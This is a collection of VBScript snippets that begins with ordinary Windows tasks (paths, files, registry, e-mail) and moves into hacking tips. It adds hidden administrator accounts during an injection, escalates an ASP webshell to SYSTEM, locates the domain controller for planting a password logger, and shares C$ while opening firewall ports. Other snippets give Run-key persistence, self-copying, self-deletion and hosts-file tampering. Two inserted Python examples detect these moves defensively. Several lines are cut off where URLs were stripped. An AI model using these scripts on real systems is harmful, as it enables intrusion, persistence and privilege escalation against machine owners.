Some uses of VBS

VBS: get the Windows installation path

First define a variable that holds the Windows installation path; it can then be spliced into other strings as "&strWinDir&".

set WshShell = WScript.CreateObject("WScript.Shell")
strWinDir = WshShell.ExpandEnvironmentStrings("%WinDir%")


VBS: get the C:\Program Files path

msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%ProgramFiles%")


VBS: get the C:\Program Files\Common Files path

msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%CommonProgramFiles%")


Add a URL shortcut to the desktop

set gangzi = WScript.CreateObject("WScript.Shell")
strDesktop = gangzi.SpecialFolders("Desktop")
set oShellLink = gangzi.CreateShortcut(strDesktop & "\Internet Explorer.lnk")
oShellLink.TargetPath = "
oShellLink.Description = "Internet Explorer"
oShellLink.IconLocation = "%ProgramFiles%\Internet Explorer\iexplore.exe, 0"
oShellLink.Save


Add a URL to Favorites

Const ADMINISTRATIVE_TOOLS = 6 ' 6 is the Favorites folder (ssfFAVORITES), despite the constant's name

Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS)
Set objFolderItem = objFolder.Self   

Set objShell = WScript.CreateObject("WScript.Shell")
strDesktopFld = objFolderItem.Path
Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "\奮斗Blog.url")
objURLShortcut.TargetPath = "
objURLShortcut.Save


Delete files with a given extension from a given directory

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\*.vbs", True
Set fso = Nothing


VBS: change the browser home page

Set oShell = CreateObject("WScript.Shell")
oShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","


VBS: add a startup (Run) entry

Set oShell=CreateObject("Wscript.Shell")
oShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cmd","cmd.exe"


VBS: copy itself

set copy1=createobject("scripting.filesystemobject")
copy1.getfile(wscript.scriptfullname).copy("c:\huan.vbs")


Copy itself to huan.vbs on drive C (the code below copies game.exe from the script's directory to gangzi.exe on drive C)

set copy1=createobject("scripting.filesystemobject")
copy1.getfile("game.exe").copy("c:\gangzi.exe")


VBS: get the system temporary directory

Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
Dim tempfolder
Const TemporaryFolder = 2
Set tempfolder = fso.GetSpecialFolder(TemporaryFolder)
Wscript.Echo tempfolder


Keep executing even if the code raises an error

On Error Resume Next


VBS: open a URL

Set objShell = CreateObject("Wscript.Shell")
objShell.Run("


VBS: send e-mail

NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
Set Email = CreateObject("CDO.Message")
Email.From = "發件@qq.com"
Email.To = "收件@qq.com"
Email.Subject = "Test sendmail.vbs"
Email.Textbody = "OK!"
Email.AddAttachment "C:\1.txt"
With Email.Configuration.Fields
.Item(NameSpace&"sendusing") = 2
.Item(NameSpace&"smtpserver") = "smtp.郵件服務器.com"
.Item(NameSpace&"smtpserverport") = 25
.Item(NameSpace&"smtpauthenticate") = 1
.Item(NameSpace&"sendusername") = "發件人用戶名"
.Item(NameSpace&"sendpassword") = "發件人密碼"
.Update
End With
Email.Send


VBS: terminate a process

strComputer = "."
Set objWMIService = GetObject _
    ("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'Rar.exe'")
For Each objProcess in colProcessList
    objProcess.Terminate()
Next


VBS: open a URL hidden (some browsers cannot be opened hidden and open visibly instead; suitable for mainstream users)

createObject("wscript.shell").run "iexplore 


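Works regardless of the default browser: open the URL with IE's absolute path plus an argument. There is no function that returns the IE installation path, only one that returns the Program Files path. This should be better than the method above, but neither method is guaranteed to work.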

Set objws=WScript.CreateObject("wscript.shell")
objws.Run """C:\Program Files\Internet Explorer\iexplore.exe""


VBS: walk the disks and delete files with a given name

On Error Resume Next
Dim fPath
strComputer = "."
Set objWMIService = GetObject _
    ("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = 'gangzi.exe'")
For Each objProcess in colProcessList
    objProcess.Terminate()
Next
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colDirs = objWMIService. _
ExecQuery("Select * from Win32_Directory where name LIKE '%c:%' or name LIKE '%d:%' or name LIKE '%e:%' or name LIKE '%f:%' or name LIKE '%g:%' or name LIKE '%h:%' or name LIKE '%i:%'")
Set objFSO = CreateObject("Scripting.FileSystemObject")
For Each objDir in colDirs
fPath = objDir.Name & "\gangzi.exe"
objFSO.DeleteFile(fPath), True
Next


VBS: get the network adapter MAC address

Dim mc,mo
Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
For Each mo In mc
If mo.IPEnabled=True Then
MsgBox "本機網卡MAC地址是: " & mo.MacAddress
Exit For
End If
Next


VBS: read the home page address from the local registry

Set reg=WScript.CreateObject("WScript.Shell")
startpage=reg.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page")
MsgBox startpage


VBS: walk every directory on every disk, find all .txt files, and append a line to the end of each

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Co = VbCrLf & "路過。。。"

For Each i In fso.Drives
  If i.DriveType = 2 Then
    GF fso.GetFolder(i & "\")
  End If
Next

Sub GF(fol)
  Wh fol
  Dim i
  For Each i In fol.SubFolders
    GF i
  Next
End Sub

Sub Wh(fol)
  Dim i
  For Each i In fol.Files
    If LCase(fso.GetExtensionName(i)) = "shtml" Then
      fso.OpenTextFile(i,8,0).Write Co
    End If
  Next
End Sub


Get all drive letters on the computer

Set fso=CreateObject("scripting.filesystemobject")
Set objdrives=fso.Drives 'get all disk drives on this computer
For Each objdrive In objdrives   'iterate over the drives
MsgBox objdrive
Next


VBS: create a file in the root directory of every local disk

On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set gangzis=fso.Drives 'get all disk drives on this computer
For Each gangzi In gangzis   'iterate over the drives
Set TestFile=fso.CreateTextFile(""&gangzi&"\新建文件夾.vbs",True)
TestFile.WriteLine("By 
TestFile.Close
Next


VBS: walk all local disks, find every 123.exe and rename it to 321.exe

set fs = CreateObject("Scripting.FileSystemObject")

for each drive in fs.drives
fstraversal drive.rootfolder
next

sub fstraversal(byval this)
for each folder in this.subfolders
fstraversal folder
next
set files = this.files
for each file in files
if file.name = "123.exe" then file.name = "321.exe"
next
end sub


VBS: write text to the clipboard (a note first: almost every example online writes to the clipboard through the InternetExplorer.Application object, whose drawback is that a browser window pops up when the default browser is not IE, so it took a lot of effort to find this code instead)

str="這里是你要復制到剪貼板的字符串"
Set ws = wscript.createobject("wscript.shell")
ws.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0,true


QQ: send a message automatically

On Error Resume Next
str="我是笨蛋/qq"
Set WshShell=WScript.CreateObject("WScript.Shell")
WshShell.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0
WshShell.run "tencent://message/?Menu=yes&uin=20016964&Site=&Service=200&sigT=2a39fb276d15586e1114e71f7af38e195148b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0,true
WScript.Sleep 3000
WshShell.SendKeys "^v"
WshShell.SendKeys "%s"


VBS: hide a file

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("F:\軟件大賽\show.txt")
' Set the Hidden attribute (2) only if it is not already set
If (objFile.Attributes And 2) = 0 Then
    objFile.Attributes = objFile.Attributes Or 2
End If


VBS: generate random numbers (521 is the generation rule, i.e. the seed; a different number gives a different rule; this can be used for other purposes)

Randomize 521
point=Array(Int(100*Rnd+1),Int(1000*Rnd+1),Int(10000*Rnd+1))
msgbox join(point,"")


VBS: remove the IE icon from the desktop (the built-in icon, not a shortcut)

Set oShell = CreateObject("WScript.Shell")
oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"


VBS: get the script's own file name

Set fso = CreateObject("Scripting.FileSystemObject")
msgbox WScript.ScriptName


VBS: read a Unicode-encoded file

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile("gangzi.txt",1,False,-1)
strText = objFile.ReadAll
objFile.Close
Wscript.Echo strText


VBS: read a file in a specified encoding (UTF-8 by default); the variable gangzi is the path of the file to read

set stm2 =createobject("ADODB.Stream")
stm2.Charset = "utf-8"
stm2.Open
stm2.LoadFromFile gangzi
readfile = stm2.ReadText
MsgBox readfile


VBS: disable Group Policy

Set oShell = CreateObject("WScript.Shell")
oShell.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins",1,"REG_DWORD"


VBS: write a file in a specified encoding (UTF-8 by default); the variable gangzi is the file path and gangzi2 holds the content

gangzi="1.txt"
gangzi2="
Set Stm1 = CreateObject("ADODB.Stream")
Stm1.Type = 2
Stm1.Open
Stm1.Charset = "UTF-8"
Stm1.Position = Stm1.Size
Stm1.WriteText gangzi2
Stm1.SaveToFile gangzi,2
Stm1.Close
set Stm1 = nothing


VBS: list the names of all folders in the current directory (subfolders not included)

Set fso=CreateObject("scripting.filesystemobject")
Set f=fso.GetFolder(fso.GetAbsolutePathName("."))
Set folders=f.SubFolders
For Each fo In folders
  wsh.echo fo.Name
Next
Set folders=Nothing
Set f=nothing
Set fso=nothing


VBS: list the names of all folders under a given directory (subfolders included)

Dim t
Set fso=WScript.CreateObject("scripting.filesystemobject")
Set fs=fso.GetFolder("d:\")
WScript.Echo aa(fs)
Function aa(n)
Set f=n.subfolders
For Each uu In f
Set op=fso.GetFolder(uu.path)
t=t & vbcrlf & op.path
Call aa(op)
Next
aa=t
End function


VBS: create a .URL file (different IconIndex values select different icons; see the icons contained in SHELL32.dll)

set fso=createobject("scripting.filesystemobject")
qidong=qidong&"[InternetShortcut]"&Chr(13)&Chr(10)
qidong=qidong&"URL=http://www.baidu.com"&Chr(13)&Chr(10)
qidong=qidong&"IconFile=C:\WINDOWS\system32\SHELL32.dll"&Chr(13)&Chr(10)
qidong=qidong&"IconIndex=130"&Chr(13)&Chr(10)
Set TestFile=fso.CreateTextFile("qq.url",True)
TestFile.WriteLine(qidong)
TestFile.Close


VBS: write to the hosts file (no check is made; the entry is appended at the end whether or not it already exists)

Set fs = CreateObject("Scripting.FileSystemObject")
path = ""&fs.GetSpecialFolder(1)&"\drivers\etc\hosts"
Set f = fs.OpenTextFile(path,8,TristateFalse)
f.Write ""&vbcrlf&"127.0.0.1 
f.Close


VBS: read the names of all keys under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace and print them in a loop

Const HKLM = &H80000002
strPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace"
Set oreg = GetObject("Winmgmts:\root\default:StdRegProv")
    oreg.EnumKey HKLM,strPath,arr
    For Each x In arr
        WScript.Echo x
    Next


VBS: create a txt file

Dim fso,TestFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set TestFile=fso.CreateTextFile("C:\hello.txt",True)
TestFile.WriteLine("Hello,World!")
TestFile.Close


VBS: create a folder

Dim fso,fld
Set fso=CreateObject("Scripting.FileSystemObject")
Set fld=fso.CreateFolder("C:\newFolder")


VBS: check whether a folder exists

Dim fso,fld
Set fso=CreateObject("Scripting.FileSystemObject")
If (fso.FolderExists("C:\newFolder")) Then
msgbox("Folder exists.")
else
set fld=fso.CreateFolder("C:\newFolder")
End If


VBS: check for a folder using variables

Dim fso,fld
drvName="C:\"
fldName="newFolder"
Set fso=CreateObject("Scripting.FileSystemObject")
If (fso.FolderExists(drvName&fldName)) Then
msgbox("Folder exists.")
else
set fld=fso.CreateFolder(drvName&fldName)
End If


VBS: add input boxes

Dim fso,TestFile,fileName,drvName,fldName
drvName=inputbox("Enter the drive to save to:","Drive letter")
fldName=inputbox("Enter the folder name:","Folder name")
fileName=inputbox("Enter the name of the file:","Filename")
Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then
msgbox("Folder exists")
Else
Set fld=fso.CreateFolder(drvName&fldName)
End If

Set TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True)

TestFile.WriteLine("Hello,World!")
TestFile.Close


VBS: check whether a file with the same name already exists

Dim fso,TestFile,fileName,drvName,fldName
drvName=inputbox("Enter the drive to save to:","Drive letter")
fldName=inputbox("Enter the folder name:","Folder name")
fileName=inputbox("Enter the name of the file:","Filename")
Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then
msgbox("Folder exists")
Else
Set fld=fso.CreateFolder(drvName&fldName)
End If

If(fso.FileExists(drvName&fldName&"\"&fileName&".txt"))Then
msgbox("File already exists.")
Else
Set TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True)
TestFile.WriteLine("Hello,World!")
TestFile.Close
End If


VBS: overwrite or append to a file

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",2,True)   '1 = read-only, 2 = write, 8 = append
openFile.Write "Hello World!"
openFile.Close


VBS: read a file; ReadAll reads everything

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
MsgBox(openFile.ReadAll)


VBS: read a file; ReadLine reads one line

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
MsgBox(openFile.ReadLine())
MsgBox(openFile.ReadLine())   'reading more lines than the file contains raises an error


VBS: read a file; Read reads n characters

Dim fso,openFile
Set fso=CreateObject("Scripting.FileSystemObject")
Set openFile=fso.OpenTextFile("C:\test.txt",1,True)
MsgBox(openFile.Read(2))   'asking for more characters than the file contains does not raise an error


VBS: delete a file

Dim fso
Set fso=CreateObject("Scripting.FileSystemObject")
fso.DeleteFile("C:\test.txt")


VBS: delete a folder

Dim fso
Set fso=CreateObject("Scripting.FileSystemObject")
fso.DeleteFolder("C:\newFolder") 'the folder is deleted together with its contents, whether or not it contains files


VBS: create several files in a row

Dim fso,TestFile
Set fso=CreateObject("Scripting.FileSystemObject")
For i=1 To 10
Set TestFile=fso.CreateTextFile("C:\hello"&i&".txt",True)
TestFile.WriteLine("Hello,World!")
TestFile.Close
Next


VBS: generate a random string from the computer name

set ws=createobject("wscript.shell")
set wenv=ws.environment("process")
RDA=wenv("computername")
Function UCharRand(n)
For i=1 to n
Randomize ASC(MID(RDA,1,1))
temp = cint(25*Rnd)
temp = temp +65
UCharRand = UCharRand & chr(temp)
Next
End Function
msgbox UCharRand(LEN(RDA))


VBS: generate a serial number from the MAC address

Function Encode(strPass)
   Dim i, theStr, strTmp

   For i = 1 To Len(strPass)
    strTmp = Asc(Mid(strPass, i, 1))
    theStr = theStr & Abs(strTmp)
   Next

   strPass = theStr
   theStr = ""

   Do While Len(strPass) > 16
    strPass = JoinCutStr(strPass)
   Loop

   For i = 1 To Len(strPass)
    strTmp = CInt(Mid(strPass, i, 1))
    strTmp = IIf(strTmp > 6, Chr(strTmp + 60), strTmp)
    theStr = theStr & strTmp
   Next

   Encode = theStr
End Function

Function JoinCutStr(str)
   Dim i, theStr
   For i = 1 To Len(str)
    If Len(str) - i = 0 Then Exit For
    theStr = theStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i +1, 1))) / 2))
    i = i + 1
   Next
   JoinCutStr = theStr
End Function

Function IIf(var, val1, val2)
   If var = True Then
    IIf = val1
   Else
    IIf = val2
   End If
End Function

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
For Each mo In mc
If mo.IPEnabled=True Then
theStr = mo.MacAddress
Exit For
End If
Next

Randomize Encode(theStr)
rdnum=Int(10*Rnd+5)

Function allRand(n)
  For i=1 to n
    Randomize Encode(theStr)
    temp = cint(25*Rnd)
    If temp mod 2 = 0 then
      temp = temp + 97
    ElseIf temp < 9 then
      temp = temp + 48
    Else
      temp = temp + 65
    End If
    allRand = allRand & chr(temp)
  Next
End Function
msgbox allRand(rdnum)


VBS: connect ADSL automatically

Dim Wsh
Set Wsh = WScript.CreateObject("WScript.Shell")
wsh.run "Rasdial 連接名字 賬號 密碼",false,1


VBS: disconnect ADSL automatically

Dim Wsh
Set Wsh = WScript.CreateObject("WScript.Shell")
wsh.run "Rasdial /DISCONNECT",false,1


VBS: change the IP every 3 seconds and open a URL (worth mentioning: in the code below every URL is opened in the same IE window, so each navigation replaces the previous one; if every URL should open in a new window, just use Run)

Dim Wsh
Set Wsh = WScript.CreateObject("WScript.Shell")
Set oIE = CreateObject("InternetExplorer.Application")
for i=1 to 5
wsh.run "Rasdial /DISCONNECT",false,1
wsh.run "Rasdial 連接名字 賬號 密碼",false,1
oIE.Navigate "
Call SynchronizeIE
oIE.Visible = True
next
Sub SynchronizeIE
On Error Resume Next
Do While(oIE.Busy)
WScript.Sleep 3000
Loop
End Sub


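Adding an administrator account with VBS
During an injection you may clearly have the sa account, yet because net.exe and net1.exe are restricted, or for some other unknown reason, adding an administrator account keeps failing. In its Active Directory (ADSI) part, VBS has a WinNT object that can manage local resources; it can be used to add an administrator without relying on cmd or similar commands. The code is as follows: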

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) 'get the ADSI interface and bind
Set oe=GetObject(os&"/Administrators,group") 'property: the admin group
Set od=ob.Create("user","lcx") 'create the user
od.SetPassword "123456" 'set the password
od.SetInfo 'save
Set of=GetObject(os&"/lcx",user) 'get the user
oe.add os&"/lcx"


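If this code is saved as 1.vbs and run from cmd as cscript 1.vbs, it adds an administrator named lcx with the password 123456 to the current system. Of course, you can edit the values lcx and 123456 in Notepad and change them to whatever name and password you like.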
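
Because the ADSI route above never starts net.exe or cmd.exe, command-line monitoring does not see it, but with account-management auditing enabled the Security log still records the account creation (event 4720) and the group change (event 4732). The following is an added example, not part of the original page: it correlates the two events over constructed sample records; the flat dict layout, the account names other than lcx, and the 60-second window are assumptions.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the local Administrators group
WINDOW = timedelta(seconds=60)        # assumed correlation window

# Constructed sample records: Security-log events flattened to dicts.
# 4720 = a user account was created, 4732 = a member was added to a local group.
NEW_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
TMP_SID = "S-1-5-21-1111111111-2222222222-3333333333-1106"
OLD_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-01-10T03:14:07", "SubjectUserName": "sqlservice",
     "TargetUserName": "lcx", "TargetSid": NEW_SID},
    {"EventID": 4732, "TimeCreated": "2024-01-10T03:14:08", "SubjectUserName": "sqlservice",
     "MemberSid": NEW_SID, "TargetUserName": "Administrators", "TargetSid": ADMINISTRATORS_SID},
    # Benign: a new account that only joins the Users group (S-1-5-32-545).
    {"EventID": 4720, "TimeCreated": "2024-01-10T09:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "temp01", "TargetSid": TMP_SID},
    {"EventID": 4732, "TimeCreated": "2024-01-10T09:00:02", "SubjectUserName": "helpdesk",
     "MemberSid": TMP_SID, "TargetUserName": "Users", "TargetSid": "S-1-5-32-545"},
    # Not matched: a long-standing account is promoted, no 4720 precedes it.
    {"EventID": 4732, "TimeCreated": "2024-01-10T11:30:00", "SubjectUserName": "admin",
     "MemberSid": OLD_SID, "TargetUserName": "Administrators", "TargetSid": ADMINISTRATORS_SID},
]


def find_new_admins(events, window=WINDOW):
    """Return accounts created and then added to Administrators within `window`."""
    created = {}    # account SID -> (creation time, account name, creator)
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ts, ev["TargetUserName"], ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            # In 4732, TargetSid is the group and MemberSid is the account added.
            hit = created.get(ev["MemberSid"])
            if hit and timedelta(0) <= ts - hit[0] <= window:
                findings.append({
                    "account": hit[1],
                    "sid": ev["MemberSid"],
                    "created_by": hit[2],
                    "added_by": ev["SubjectUserName"],
                    "seconds_between": int((ts - hit[0]).total_seconds()),
                })
    return findings


if __name__ == "__main__":
    for finding in find_new_admins(SAMPLE_EVENTS):
        print(finding)
```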

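Listing the physical directories of virtual hosts with VBS
Sometimes, after getting into one site through a neighbouring site on the same server and obtaining system privileges, you face hundreds of virtual hosts; how do you find the physical directory of the target site more quickly? Going through the sites one by one is tiring, and the adsutil.vbs that ships with the system seems to take so many parameters that it is hard to know where to start. Try this script of mine; the code is as follows: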

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf

End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit


After running cscript 2.vbs, the site IDs, descriptions and physical directories in IIS are listed in detail. Much less code, and convenient too, isn't it?

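Quickly finding the primary server of an internal domain with VBS
Faced with a domain-structured internal network, many beginners may have no experience of how to penetrate it. If you can get the primary domain administrator's password, you can move freely through the whole internal network. The primary domain administrator usually stays on the more important machines; if you can take over one or a few of them and plant something like a password logger, sooner or later you will get the password. The primary domain server is of course the most important of them; how do you tell which one it is among thousands of machines? A DOS command such as net group "domain admins" /domain can serve as one criterion, but VBS can do it too; this still belongs to the ADSI part. The code is as follows: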

set obj=GetObject("wscript.echo obj.servername


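These two lines of code are enough; run cscript 3.vbs and you will get a result. Of course, whether you use the DOS command or VBS, you must be running with domain-user privileges. For example, if you have obtained a domain user's account and password, you can use the form psexec.exe -u -p cmd.exe to get a shell as that domain user; or, if your trojan already interacts with the desktop and the user logged in to your trojan's shell is a domain user, you can run these commands directly.
The role of VBS in intrusions is of course not limited to these, and JS or other tools can also do what the code above does; but the topic set for this column is the clever uses of VBS in hacking, so we only cover VBS. After finishing this VBS part, the other authors and I will go on to plan other topics for later columns, aiming to bring readers good and useful articles.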

VBS code for privilege escalation from a WebShell
ASP trojans have always been one of the favourite tools of people who work with scripts, but because their privileges are usually fairly low (typically those of IWAM_NAME), people have come up with all sorts of ways to raise them, for example obtaining MSSQL database privileges through the ASP trojan, getting hold of FTP password information, or replacing a service program. The trick I introduce today uses a VBS file to raise the ASP trojan's privileges; the code is as follows:

set wsh=createobject("wscript.shell") 'create a wsh object
a=wsh.run ("cmd.exe /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps C:\WINNT\system32\inetsrv\httpext.dll C:\WINNT\system32\inetsrv\httpodbc.dll C:\WINNT\system32\inetsrv\ssinc.dll C:\WINNT\system32\msw3prt.dll C:\winnt\system32\inetsrv\asp.dll",0) 'add asp.dll to InProcessIsapiApps


Save it with a .vbs extension, upload it to the server, and then execute this VBS file through the ASP trojan. Try your ASP trojan again and you will find that you now have SYSTEM privileges.

VBS: enable the IPC service and related settings

Dim OperationRegistry
Set OperationRegistry=WScript.CreateObject("WScript.Shell")
OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0

Set wsh3=wscript.createobject("wscript.shell")
wsh3.Run "net user helpassistant 123456",0,false
wsh3.Run "net user helpassistant /active",0,false
wsh3.Run "net localgroup administrators helpassistant /add",0,false

wsh3.Run "net start Lanmanworkstation /y",0,false
wsh3.Run "net start Lanmanserver /y",0,false
wsh3.Run "net start ipc$",0,True
wsh3.Run "net share c$=c:\",0,false

wsh3.Run "netsh firewall set notifications disable",0,True
wsh3.Run "netsh firewall set portopening TCP 139 enable",0,false
wsh3.Run "netsh firewall set portopening UDP 139 enable",0,false
wsh3.Run "netsh firewall set portopening TCP 445 enable",0,false
wsh3.Run "netsh firewall set portopening UDP 445 enable",0,false
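
The snippets on this page share a small set of tell-tale constructs: Run-key writes, hosts-file appends, WinNT:// account creation, mshta vbscript:, netsh firewall port openings, InProcessIsapiApps changes and forceguest writes. The following is an added example, not part of the original page: a static triage pass that flags those constructs in VBScript source, run here over constructed sample scripts; the rule names and regular expressions are assumptions chosen to match the snippets above, and a hit is a prompt for review rather than a verdict.

```python
import re

# Rule name -> patterns that must ALL occur somewhere in the script.
# Each rule mirrors a construct used by the snippets on this page.
RULES = {
    "run_key_persistence":    [r"\.RegWrite\b", r"\\CurrentVersion\\Run(Once)?\\"],
    "forceguest_change":      [r"\.RegWrite\b", r"\\Control\\Lsa\\forceguest"],
    "hosts_file_access":      [r"\\drivers\\etc\\hosts\b", r"\b(OpenTextFile|CreateTextFile)\b"],
    "local_account_creation": [r"WinNT://", r"\.Create\s*\(\s*\"user\""],
    "admin_group_change":     [r"Administrators,group|localgroup\s+administrators"],
    "mshta_inline_script":    [r"\bmshta\s+vbscript:"],
    "firewall_port_opening":  [r"\bnetsh\s+firewall\s+set\s+portopening\b"],
    "iis_inprocess_isapi":    [r"\bset\s+/W3SVC/InProcessIsapiApps\b"],
}

# Constructed sample: persistence through a variable plus a line continuation,
# a hosts-file append and a firewall change.
SAMPLE_SCRIPT = r'''
On Error Resume Next
Set sh = CreateObject("WScript.Shell")
RegPath = "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
sh.RegWrite RegPath & "updater", _
    "C:\Users\Public\updater.vbs", "REG_SZ"
Set fs = CreateObject("Scripting.FileSystemObject")
Set f = fs.OpenTextFile(fs.GetSpecialFolder(1) & "\drivers\etc\hosts", 8)
f.Write vbCrLf & "127.0.0.1 example.invalid"
sh.Run "netsh firewall set portopening TCP 445 enable", 0, False
'''

# Constructed benign sample: a registry read, plus a comment that only mentions a write.
BENIGN_SCRIPT = r'''
' sh.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\x", "y"
Set sh = CreateObject("WScript.Shell")
MsgBox sh.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
'''


def scan_vbs(source):
    """Return {rule name: [first matching logical line per pattern]} for rules that hit."""
    # Join VBScript line continuations (" _" at end of line) into one logical line.
    text = re.sub(r"[ \t]_[ \t]*\r?\n", " ", source)
    # Drop blank lines and whole-line comments; VBScript itself is case-insensitive.
    lines = [ln.strip() for ln in text.splitlines()
             if ln.strip() and not ln.lstrip().startswith("'")]
    findings = {}
    for name, patterns in RULES.items():
        evidence = []
        for pattern in patterns:
            rx = re.compile(pattern, re.IGNORECASE)
            hit = next((ln for ln in lines if rx.search(ln)), None)
            if hit is None:
                break               # one required pattern is missing: rule does not fire
            evidence.append(hit)
        else:
            findings[name] = evidence
    return findings


if __name__ == "__main__":
    for rule, evidence in scan_vbs(SAMPLE_SCRIPT).items():
        print(rule, "->", evidence)
```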


VBS: time-of-day check

Digital=time
    hours=Hour(Digital)
    minutes=Minute(Digital)
    seconds=Second(Digital)
    if (hours<6) then
        dn="凌辰了,還沒睡啊?"
    end if
    if (hours>=6) then
        dn="早上好!"
    end if
    if (hours>12) then
        dn="下午好!"
    end if
    if (hours>18) then
        dn="晚上好!"
    end if
    if (hours>22) then
        dn="不早了,夜深了,該睡覺了!"
    end if
    if (minutes<=9) then
        minutes="0" & minutes
    end if
    if (seconds<=9) then
        seconds="0" & seconds
    end if
ctime=hours & ":" & minutes & ":" & seconds & " " & dn
Msgbox ctime


VBS: registry read and write

Dim OperationRegistry , mynum
Set OperationRegistry=WScript.CreateObject("WScript.Shell")
mynum = 9
mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest")
MsgBox("before forceguest = "&mynum)

OperationRegistry.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0

mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest")
MsgBox("after forceguest = "&mynum)


VBS: delete the script itself after it runs

dim fso,f
Set fso = CreateObject("Scripting.FileSystemObject")

f = fso.DeleteFile(WScript.ScriptName)

WScript.Echo( WScript.ScriptName)

Copy a file found by search to another specified folder

set r=createobject("scripting.filesystemobject")
p="c:\a.rar" 'destination folder; the file is renamed to a.rar
w="tem1.rar" 'source
pth="d:\123\a34" 'source folder
f pth
d pth

sub d(x)
on error resume next
for each i in r.getfolder(x).subfolders
f i
d i
next
end sub

sub f(n)
for each c in r.getfolder(n).files
if instr(1,c,w,1)>0 then
r.copyfile c,p
if r.fileexists(p) then 'check that the copy now exists at the destination
msgbox"成功",64
else
msgbox"失敗",16
end if
wscript.quit
end if
next
end sub
-----------------------------------------------------------------
Dim AutoRunProgram   'declare the variable
Set AutoRunProgram = WScript.CreateObject("WScript.shell")
RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"   'registry location for programs started at boot
Type_Name = "REG_SZ"   'registry data type
Key_Name = "****"   'name of the registry value to write; use the name of the program that should start at boot
Key_data = "C:\******.vbs"   'full path of the program that should start at boot
AutorunProgram.RegWrite regpath&Key_Name,Key_data,Type_Name

Terminate a process

strComputer="."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colProcessList=objWMIService.ExecQuery ("select * from Win32_Process where Name='notepad.exe' ")
